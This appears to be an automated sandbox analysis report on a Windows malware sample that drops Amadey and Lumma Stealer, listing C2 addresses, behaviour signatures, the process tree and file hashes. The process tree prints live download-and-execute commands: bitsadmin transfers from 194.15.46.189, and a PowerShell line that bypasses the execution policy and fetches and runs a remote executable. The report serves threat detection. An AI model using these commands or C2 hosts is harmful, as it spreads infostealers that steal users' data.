Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28/11/2024, 19:01

General

  • Target

    file.exe

  • Size

    1.8MB

  • MD5

    2973a8b36517005333545a7751a03f4f

  • SHA1

    ea5f6788309a5beb6d85f0e3abbe588598a7023b

  • SHA256

    126e371440a1d6372b23741aa24bd4b0ed00e7f90657a796b18c6c05ba003ae9

  • SHA512

    307406fb0a9a55d3cf54da1b2bfac2313defce6eb66e60ad832cb3915a642ebe54e26c85304c96ee1e63cd6ee0878a3b2a91e3cfa1e6771c4776a374daa22b67

  • SSDEEP

    49152:RzHJLfl5MUuB+8x+C4UMIdS35uAnpo7RevACJE5/A:91t5lpC1hkuAncIoCJE

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

lumma

C2

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://tail-cease.cyou

Extracted

Family

lumma

C2

https://tail-cease.cyou/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Powershell Invoke Web Request.

  • Download via BitsAdmin 1 TTPs 2 IoCs
  • Downloads MZ/PE file
  • Checks BIOS information in registry 2 TTPs 12 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 11 IoCs
  • Identifies Wine through registry keys 2 TTPs 6 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 9 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies registry class 25 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 15 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4932
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:2176
      • C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe
        "C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe"
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • Suspicious use of WriteProcessMemory
        PID:2040
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe" /nologo /codebase "C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:5084
      • C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe
        "C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Adds Run key to start application
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:1620
      • C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe
        "C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4424
        • C:\Windows\SysWOW64\ping.exe
          ping -n 1 8.8.8.8
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Runs ping.exe
          PID:2132
        • C:\Windows\SysWOW64\bitsadmin.exe
          bitsadmin /transfer "DownloadUnRAR" /priority high "http://194.15.46.189/UnRAR.exe" "C:\Users\Admin\AppData\Local\Temp\UnRAR.exe"
          4⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:2936
        • C:\Windows\SysWOW64\bitsadmin.exe
          bitsadmin /transfer "DownloadletgrtsC1" /priority high "http://194.15.46.189/letgrtsC1.rar" "C:\Users\Admin\AppData\Local\Temp\letgrtsC1.rar"
          4⤵
          • Download via BitsAdmin
          • System Location Discovery: System Language Discovery
          PID:2284
      • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2060
        • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe
          "C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:4048
      • C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe
        "C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe"
        3⤵
        • Executes dropped EXE
        • Enumerates connected drives
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4408
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\1009928001\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1732579844 " AI_EUIMSI=""
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of FindShellTrayWindow
          PID:2788
      • C:\Users\Admin\AppData\Local\Temp\1009977001\feAo1nZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1009977001\feAo1nZ.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4464
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell.exe -Command "Set-ExecutionPolicy Bypass -Scope Process -Force; Invoke-WebRequest -Uri 'https://github.com/directuser/mnemonic-checker/releases/download/1/airdrops.zip' -OutFile \"$env:APPDATA\\file.zip\"; Expand-Archive -Path \"$env:APPDATA\\file.zip\" -DestinationPath \"$env:APPDATA\\extracted\"; Remove-Item -Path \"$env:APPDATA\\file.zip\"; Start-Process \"$env:APPDATA\\extracted\\airdrops.exe\""
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:4516
      • C:\Users\Admin\AppData\Local\Temp\1009978001\a24584cedc.exe
        "C:\Users\Admin\AppData\Local\Temp\1009978001\a24584cedc.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3464
      • C:\Users\Admin\AppData\Local\Temp\1009979001\496d44de32.exe
        "C:\Users\Admin\AppData\Local\Temp\1009979001\496d44de32.exe"
        3⤵
          PID:2416
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:1784
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      1⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious behavior: EnumeratesProcesses
      PID:4564
    • C:\Windows\system32\msiexec.exe
      C:\Windows\system32\msiexec.exe /V
      1⤵
      • Enumerates connected drives
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1896
      • C:\Windows\syswow64\MsiExec.exe
        C:\Windows\syswow64\MsiExec.exe -Embedding 25BB49EEFBC45850A9375B5C166F00FD C
        2⤵
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        PID:2924
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Checks SCSI registry key(s)
      PID:2116

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Program Files\TaskbarMonitor\TaskbarMonitor.dll

      Filesize

      1.0MB

      MD5

      5dd45593985c6b40d1d2dea0ce9a2fcf

      SHA1

      700fb24d4f4e302ed94f755fa6f7caf9d6fb594e

      SHA256

      237e715b292e3ebfdf7038d42290f9a6457f0375ee965e1236bd763bce413391

      SHA512

      ca4e7df463b3d5643decfda936e4d7db1e3247c8f27a25ace150886a0c3ec2e79f1d82d2c4cbd5b89f42deaf4cd5709a7ca47d24a18ed1e1804b0c1e016966a3

    • C:\Users\Admin\AppData\Local\Temp\1009882001\TaskbarMonitorInstaller.exe

      Filesize

      2.9MB

      MD5

      2ec142b97cf35b8089846aa53bb3bf63

      SHA1

      cdfbc2b54c132e32be48b41660ede419c586ba9b

      SHA256

      91aed4763f13b9fe40ac2ef9c5508a35aa689419f65a1d43ddb33b2c07e0e74b

      SHA512

      b11642f4f0a83aabb67603aedff479d0d714e4e5341ff159d5ee312dc437b5da94f5eaccc8dff6b63750ec60457148576b215f958db1c6cf2a06be3095e19fa4

    • C:\Users\Admin\AppData\Local\Temp\1009905001\nbea1t8.exe

      Filesize

      1.6MB

      MD5

      18cf1b1667f8ca98abcd5e5dceb462e9

      SHA1

      62cf7112464e89b9fa725257fb19412db52edafd

      SHA256

      56a8033f43692f54e008b7a631c027682e1cabd4450f9f45ce10d4fc10f3fcf3

      SHA512

      b66be8acac0152ae3a9a658fde23f3f3ad026e3f8099df5c8771eb1524e8baa2ba9f88b9577a85493f0e241089798e40a158325cb606345c94d979e0088443d0

    • C:\Users\Admin\AppData\Local\Temp\1009917001\tvtC9D3.exe

      Filesize

      42KB

      MD5

      56944be08ed3307c498123514956095b

      SHA1

      53ffb50051da62f2c2cee97fe048a1441e95a812

      SHA256

      a34d38dfb2866e7e20c7530046289a0fdfc440aa2b019e6ff90a8d03e016b181

      SHA512

      aa196a1a1e44c3fde974bbf8a031e6943a474d16d5a956b205d283ee5be53e110dba52817f7f2782e7ecc8783fea77f9c34613f99fb81fe09d2bea8b2f91bc13

    • C:\Users\Admin\AppData\Local\Temp\1009923001\uxN4wDZ.exe

      Filesize

      984KB

      MD5

      a55d149ef6d095d1499d0668459c236f

      SHA1

      f29aae537412267b0ad08a727ccf3a3010eea72b

      SHA256

      c4a5fdd606768f6f69aa9e6cad874296c8e1e85f88b17f12b4ecab2c247c54ce

      SHA512

      2c89c0b92afaf69e7c1a63e44ebbe41c7919ad74abd2b70a6077faa6a4ca24bc6103ddf584633cd177a858550c667b430668095c3dc9abb27fefa38940d4370b

    • C:\Users\Admin\AppData\Local\Temp\1009928001\TcMBq5M.exe

      Filesize

      17.7MB

      MD5

      5f602a88eb5e8abb43c9035585f8dbef

      SHA1

      b17a1bc278f0c7ccc8da2f8c885f449774710e4c

      SHA256

      95b586a973d1b82e0ab59cd1127466d11fdf7fd352e10b52daa3e9a43d02d1f0

      SHA512

      9575baf06700e8b10e03a20d80f570c6c9cf0ee09ad7589d58f096c7a73a5c17d31856b73120f9e38cd2ba2e13f1082b206ccbee3b070dd9b70b4e6460df5fff

    • C:\Users\Admin\AppData\Local\Temp\1009977001\feAo1nZ.exe

      Filesize

      957KB

      MD5

      1ca29f32c02f847a6a2ce55775f92a8e

      SHA1

      e98c84e034dbddb83dc9f6f2b56bd8332b9445e1

      SHA256

      f607c51e418a43318045be784be9f311f77625931cc6ae17f39fb6c698cbee2e

      SHA512

      0049d07f095fcc4702ba2d1dd0710033020a7f85fd2307b8665a54da89d6ff0f4c845dcc52e2e8d236471e9a580ff6e03b66617edd73b92eea249de98a8b3f33

    • C:\Users\Admin\AppData\Local\Temp\1009978001\a24584cedc.exe

      Filesize

      1.8MB

      MD5

      fe7fb9fce44017e9650fadf0851ffffb

      SHA1

      5f2e8e26ba53bf996835917cd6bf8da7a0c48ffd

      SHA256

      6c8a2ebe3061f4cba5540d03c6c20cacb70173ca6d250862fe51a173c74ea0d4

      SHA512

      a86e22b71dce2142a5a4c5d9b48a3d69cc54c73ceedc691988e9a45aff4066112ede4aa820f8966071ddfa4c7e1d28361c9ef30938de0ce4ba0bc10a04d39e63

    • C:\Users\Admin\AppData\Local\Temp\1009979001\496d44de32.exe

      Filesize

      1.7MB

      MD5

      c7199ff1c5f695591c33069315052e3a

      SHA1

      2d5c03040c26c5cba6ae8f080c82ac6cb75e7e6d

      SHA256

      aa0766db9945bf02ba2332f0cde32da92e9404c788fa4e3915d96c6d63ed97b7

      SHA512

      cf9e108b7ec9bf5e15a41d4169ad4a648dbef0210860696f0114ae266dbf3053fe924a256b6bad95ab9d001c3014cdd053ca6f7280a26c77cf1069cd27f18c7c

    • C:\Users\Admin\AppData\Local\Temp\1009979001\496d44de32.exe

      Filesize

      1.1MB

      MD5

      b86d97a0a8eaff71d1197fb0225ca7d3

      SHA1

      4af82050162eca7043f7ee66f407e386547ab6a6

      SHA256

      bd2ca9b7786b7bc86cc17828181fa0d63a7587b81dec70dfff0e4aec55983090

      SHA512

      f65c88ab1d5c1a15732e9b9fed63803a45fd2bfee7cccfd9b7f7cb00b136b30fff879d0edec3b15159ec93d26fcc5c48b45f8b72045b4c6f14746762342dc677

    • C:\Users\Admin\AppData\Local\Temp\MSIB84B.tmp

      Filesize

      578KB

      MD5

      89afe34385ab2b63a7cb0121792be070

      SHA1

      56cdf3f32d03aa4a175fa69a33a21aaf5b42078d

      SHA256

      36e35eafc91451a38ad7e7958156841cd2f004d5791fd862d5afa4d5f9df9103

      SHA512

      14a851b3b4d3b8dbb9a2b3ea84d3c30fc9884a8924af0726a717c68db5e8f5e717dc78ca62e5f455010e46c1fecf294791b89f7426cc14ffdd4c84945518bb9c

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qxe1r2ji.y0v.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

      Filesize

      1.8MB

      MD5

      2973a8b36517005333545a7751a03f4f

      SHA1

      ea5f6788309a5beb6d85f0e3abbe588598a7023b

      SHA256

      126e371440a1d6372b23741aa24bd4b0ed00e7f90657a796b18c6c05ba003ae9

      SHA512

      307406fb0a9a55d3cf54da1b2bfac2313defce6eb66e60ad832cb3915a642ebe54e26c85304c96ee1e63cd6ee0878a3b2a91e3cfa1e6771c4776a374daa22b67

    • C:\Users\Admin\AppData\Local\Temp\nsu826B.tmp\nsExec.dll

      Filesize

      7KB

      MD5

      11092c1d3fbb449a60695c44f9f3d183

      SHA1

      b89d614755f2e943df4d510d87a7fc1a3bcf5a33

      SHA256

      2cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77

      SHA512

      c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a

    • C:\Users\Admin\AppData\Local\Temp\{C1F30AD5-204F-4BEE-BC9B-DD775CD60E06}\CD60E06\Click2Profit.msi

      Filesize

      2.8MB

      MD5

      bf973011e42f25d8eaa92a8c6f441c4c

      SHA1

      22358a1877ab28ef1d266cc5a5c06d44b3344959

      SHA256

      28ea007c4e157e619c2c495881ee0cc419f4c16ea45cefc71d2f9bef207a1c9e

      SHA512

      fbd82523520adc1c90a9540239c90147e4cd828d1badefa283ec096c63cb4f53f1142d8cd5e0b35e570431cad20195749412513a627aab4b3d90e3b5b238d5bd

    • memory/1620-142-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-144-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-80-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-252-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-133-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-135-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-131-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-121-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-140-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1620-126-0x0000000000400000-0x0000000000833000-memory.dmp

      Filesize

      4.2MB

    • memory/1784-64-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/1784-65-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2040-60-0x00007FF992663000-0x00007FF992665000-memory.dmp

      Filesize

      8KB

    • memory/2040-46-0x0000023600470000-0x000002360075C000-memory.dmp

      Filesize

      2.9MB

    • memory/2040-45-0x00007FF992663000-0x00007FF992665000-memory.dmp

      Filesize

      8KB

    • memory/2176-25-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-134-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-104-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-61-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-59-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-16-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-19-0x00000000001C1000-0x00000000001EF000-memory.dmp

      Filesize

      184KB

    • memory/2176-125-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-26-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-130-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-20-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-132-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-24-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-62-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-23-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-136-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-198-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-22-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-141-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-21-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2176-143-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/2416-268-0x00000000008B0000-0x0000000000F30000-memory.dmp

      Filesize

      6.5MB

    • memory/3464-251-0x00000000004B0000-0x000000000096F000-memory.dmp

      Filesize

      4.7MB

    • memory/4048-122-0x0000000000400000-0x0000000000459000-memory.dmp

      Filesize

      356KB

    • memory/4048-124-0x0000000000400000-0x0000000000459000-memory.dmp

      Filesize

      356KB

    • memory/4464-200-0x0000000000180000-0x00000000002CE000-memory.dmp

      Filesize

      1.3MB

    • memory/4516-203-0x00000000057B0000-0x00000000057D2000-memory.dmp

      Filesize

      136KB

    • memory/4516-235-0x0000000007610000-0x0000000007621000-memory.dmp

      Filesize

      68KB

    • memory/4516-201-0x0000000004B10000-0x0000000004B46000-memory.dmp

      Filesize

      216KB

    • memory/4516-202-0x0000000005180000-0x00000000057A8000-memory.dmp

      Filesize

      6.2MB

    • memory/4516-234-0x0000000007670000-0x0000000007706000-memory.dmp

      Filesize

      600KB

    • memory/4516-205-0x0000000005A80000-0x0000000005AE6000-memory.dmp

      Filesize

      408KB

    • memory/4516-204-0x00000000059A0000-0x0000000005A06000-memory.dmp

      Filesize

      408KB

    • memory/4516-233-0x0000000007450000-0x000000000745A000-memory.dmp

      Filesize

      40KB

    • memory/4516-215-0x0000000005AF0000-0x0000000005E44000-memory.dmp

      Filesize

      3.3MB

    • memory/4516-216-0x00000000060B0000-0x00000000060CE000-memory.dmp

      Filesize

      120KB

    • memory/4516-217-0x00000000060F0000-0x000000000613C000-memory.dmp

      Filesize

      304KB

    • memory/4516-219-0x000000006D7E0000-0x000000006D82C000-memory.dmp

      Filesize

      304KB

    • memory/4516-218-0x0000000006680000-0x00000000066B2000-memory.dmp

      Filesize

      200KB

    • memory/4516-229-0x00000000066C0000-0x00000000066DE000-memory.dmp

      Filesize

      120KB

    • memory/4516-230-0x00000000070A0000-0x0000000007143000-memory.dmp

      Filesize

      652KB

    • memory/4516-231-0x0000000007AC0000-0x000000000813A000-memory.dmp

      Filesize

      6.5MB

    • memory/4516-232-0x0000000007200000-0x000000000721A000-memory.dmp

      Filesize

      104KB

    • memory/4564-139-0x00000000001C0000-0x0000000000667000-memory.dmp

      Filesize

      4.7MB

    • memory/4932-0-0x0000000000D70000-0x0000000001217000-memory.dmp

      Filesize

      4.7MB

    • memory/4932-18-0x0000000000D70000-0x0000000001217000-memory.dmp

      Filesize

      4.7MB

    • memory/4932-4-0x0000000000D70000-0x0000000001217000-memory.dmp

      Filesize

      4.7MB

    • memory/4932-3-0x0000000000D70000-0x0000000001217000-memory.dmp

      Filesize

      4.7MB

    • memory/4932-2-0x0000000000D71000-0x0000000000D9F000-memory.dmp

      Filesize

      184KB

    • memory/4932-1-0x0000000076FE4000-0x0000000076FE6000-memory.dmp

      Filesize

      8KB

    • memory/5084-55-0x00000211E16E0000-0x00000211E17E6000-memory.dmp

      Filesize

      1.0MB

    • memory/5084-51-0x00000211C7050000-0x00000211C7060000-memory.dmp

      Filesize

      64KB